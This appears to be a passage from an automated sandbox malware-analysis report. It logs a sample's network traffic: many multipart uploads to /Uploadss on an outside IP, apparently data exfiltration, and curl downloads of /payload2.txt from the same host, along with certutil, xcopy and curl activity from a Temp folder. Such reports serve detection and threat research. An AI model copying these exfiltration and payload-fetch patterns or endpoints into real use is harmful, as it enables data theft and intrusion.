Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 5243310Content-Type: multipart/form-data; boundary=------------------------727b88163de31621Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------528cb38273400043
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------6ceab3228cef8607
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------a158dee7d748d662
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------5e2d7668485dfa80
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------0f7ba0280905d0a7
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------b615441db0569974
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------c38b6efbb3860b55
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------e120409de9b0961d
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------df56891ade3f02b5
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------5b9a6ba60e763601
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------6125ed5460a004ed
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------0cd032303c66daa3
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------4103ce5fab37505e
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------e9d6222010bc4b93
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------2aa72388551e1719
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------77f946c49d2aa0aa
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------23ddd58ceee731b1
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------b152df86b4cdc780
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------2d6437b9e8f9fa26
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------f9fda7251b3940ec
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------b875c75c93bfafb2
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------90b1444f43bf87bb
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------f596c2ad5c87a402
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------eebee10a2c2a0a7e
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------fb127d9661ca100d
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------6653a23fed80a45e
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------37776beab8920800
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------40df58b3406d3c6c
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------7048acb243c73c53
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------915bf5cdc8e28206
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------b29bc1940f1b3cf8
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------faed09c6aeddfcad
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------9e028a09e8444741
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------1ebd341a5c4734af
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------0a25b701dad0bb75
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------917bcfd4af7652d9
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------3755ae52020b6387
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------5781aa9441631b3e
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------f897addde1370454
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------793f3f5fb8213a21
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------79bb560cb57ad0e1
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------a317104ee2cc8105
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------883a00c3844ef429
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------57415b48de4d495c
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------3cce8b88a3742ee2
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------b2be66a73755a4fd
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------25a531a286c8b417
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------01eb8640365fd751
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------6f4cfa28ab6b91ba
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------0f60835c471703b6
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------30e95938f8d682b4
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------fa71821352b7a857
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------1d41fea49894b271
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------4c1e4f796c2c9c93
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------fff4f274d4698b1d
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------edd5ebff721373ff
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------e20020832d30f3c0
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------d4472314239c3705
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------7e127aa7b6ef26df
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------0cf99223c92232cd
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------7ce2fb84c3dc7384
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------d8f7e01a7de6f04f
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------f7a61e38904fcff7
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------8977623888b015d2
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------8961b875dcb6c2ce
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------00f564c0c06baa17
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------eaaf87d8ac660071
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------4db416eccd57981d
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------6ea26e32a284dc76
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------4be51b091cf7dce2
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------fffb92063f61af58
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------bcadf6652bcb5995
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------a0c3d46717813838
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------71e83fa42945e82e
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------2774b4aa52ecef71
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------9299cdde274089f9
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------32889ea7ae55e121
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------a678ad0b838c4a42
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------271c99aa13addee5
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------4d702bb6621a98ce
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------3ff2595632dfd343
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------6be2ae2c8e7d9a07
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------5287d62a7467fc4e
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------124d7d68b6a08cfd
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------837b5fa459944e4b
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------22f31a976d8ccacd
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------adf6f33d0b6a389e
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------69954c1bb23fa243
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------54f15fd9c89287c7
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------862973e7d8c5e47a
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------218f885d1d1b01f5
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------21ef4c783e5ef6a8
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------8d935b7ab73db626
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------3e1bcbfd1ac49b71
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------453e0988638a690b
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------936caa563e76ca26
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------96aa930188ad95d0
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------1c10b124588ac309
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------7cef968b537d35d7
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------cd9315d0f70306a2
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------1e25afe42fd86294
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------01894383c334ebcc
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------2c7fc54d6c7c04d4
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------bb4d8fe5f94a83f5
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------a9d83593ce6d0496
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------d2c48da37d466a87
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------450e1ee269f45e90
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------0089c8439ef77124
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------6e3e4c3b05a79857
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------521206e0c9b94cee
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------3e6e6e56ae2cb74d
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------03a4310a76240f87
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------0eac6bd829619dc3
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------7554e3942a8f0809
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------f183d5370c54fe4b
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------ca18e54d06119b02
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------998ba500316220a8
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------2680bd2607a01273
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------03efbda4d78b7cdf
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------a35d77128ae5cf6a
Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox ViewASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49772 version: TLS 1.0
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_0087D8C0 recv,WSAGetLastError,13_2_0087D8C0
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=PxRdW7mlrrw49Sf&MD=a2PwAHxG HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=PxRdW7mlrrw49Sf&MD=a2PwAHxG HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /payload2.txt HTTP/1.1Host: 172.104.160.126:8099User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /payload2.txt HTTP/1.1Host: 172.104.160.126:8099User-Agent: curl/7.83.1Accept: */*
Source: xcopy.exe, 0000000A.00000002.2145898386.0000000002C0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 0000000B.00000002.2148940386.0000000002928000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 0000000C.00000002.2154163486.00000000028A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: curl.exeString found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 0000000D.00000000.2155057954.00000000008B5000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: xcopy.exe, 0000001E.00000002.2727525467.00000000028DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 0000001F.00000002.2729026809.0000000004760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 0000001F.00000002.2728920488.0000000002A08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000020.00000002.2732646936.0000000002D98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: curl.exeString found in binary or memory: Usage: curl [options...] <url>
